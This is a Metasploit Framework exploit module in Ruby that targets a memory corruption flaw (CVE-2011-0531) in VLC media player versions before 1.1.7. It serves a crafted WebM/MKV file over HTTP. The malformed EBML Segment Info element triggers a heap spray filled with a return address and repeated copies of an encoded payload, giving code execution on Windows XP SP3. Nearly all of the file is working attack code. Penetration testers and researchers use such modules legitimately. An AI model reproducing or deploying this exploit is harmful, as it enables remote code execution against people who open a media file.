## # $Id: vlc_webm.rb 11692 2011-02-01 18:54:24Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'VideoLAN VLC MKV Memory Corruption', 'Description' => %q{ This module exploits an input validation error in VideoLAN VLC < 1.1.7. By creating a malicious MKV or WebM file, a remote attacker could execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'Dan Rosenberg' ], 'Version' => '$Revision: 11692 $', 'References' => [ [ 'OSVDB', '70698' ], [ 'CVE', '2011-0531' ], [ 'BID', '46060' ], [ 'URL', 'http://git.videolan.org/?p=vlc.git&a=commitdiff&h=59491dcedffbf97612d2c572943b56ee4289dd07&hp=f085cfc1c95b922e3c750ee93ec58c3f2d5f7456' ], [ 'URL', 'http://www.videolan.org/security/sa1102.html' ] ], 'Payload' => { 'Space' => 1024, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP3', { 'Ret' => 0x05050505 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Jan 31, 2011', 'DefaultTarget' => 0)) end def autofilter false end def check_dependencies use_zlib end def on_request_uri(cli, request) return if ((p = regenerate_payload(cli)) == nil) # EBML Header file = "\x1A\x45\xDF\xA3" # EBML file << "\x01\x00\x00\x00" file << "\x00\x00\x00\x1F" file << "\x42\x86\x81\x01" # EBMLVersion = 1 file << "\x42\xF7\x81\x01" # EBMLReadVersion = 1 file << "\x42\xF2\x81\x04" # EBMLMaxIDLength = 4 file << "\x42\xF3\x81\x08" # EBMLMaxSizeLength = 8 file << "\x42\x82\x84\x77" # DocType = "webm" file << "\x65\x62\x6D" file << "\x42\x87\x81\x02" # DocTypeVersion = 2 file << "\x42\x85\x81\x02" # DocTypeReadVersion = 2 # Segment data file << "\x18\x53\x80\x67" # (0) Segment file << "\x01\x00\x00\x00" file << "\x01\xD6\x22\xF1" # Seek data file << "\x11\x4D\x9B\x74" # (1) SeekHead file << "\x40\x3F" file << "\x4D\xBB\x8B" # (2) Seek file << "\x53\xAB\x84" # (3) SeekID = Segment Info file << "\x15\x49\xA9\x66" # file << "\x53\xAC\x81" # (3) SeekPosition file << "\xff" # index of segment info file << "\x53\xAB\x84" # (3) SeekID = Tracks file << "\x16\x54\xAE\x6B" # file << "\x42" * 228 # Padding # Data file << "\x15\x49\xA9\x66" # (1) Segment Info file << "\x01\x00\x00\x00" # file << "\x01\xff\xff\xff" # This triggers our heap spray... file << [target.ret].pack('V') # Object address # Spray the heap file << ([target.ret].pack('V') * 0xa0000) file << payload.encoded file << ([target.ret].pack('V') * 0xa0000) file << payload.encoded file << ([target.ret].pack('V') * 0xa0000) file << payload.encoded file << ([target.ret].pack('V') * 0xa0000) file << payload.encoded print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, file, { 'Content-Type' => 'application/octet-stream' }) handler(cli) end end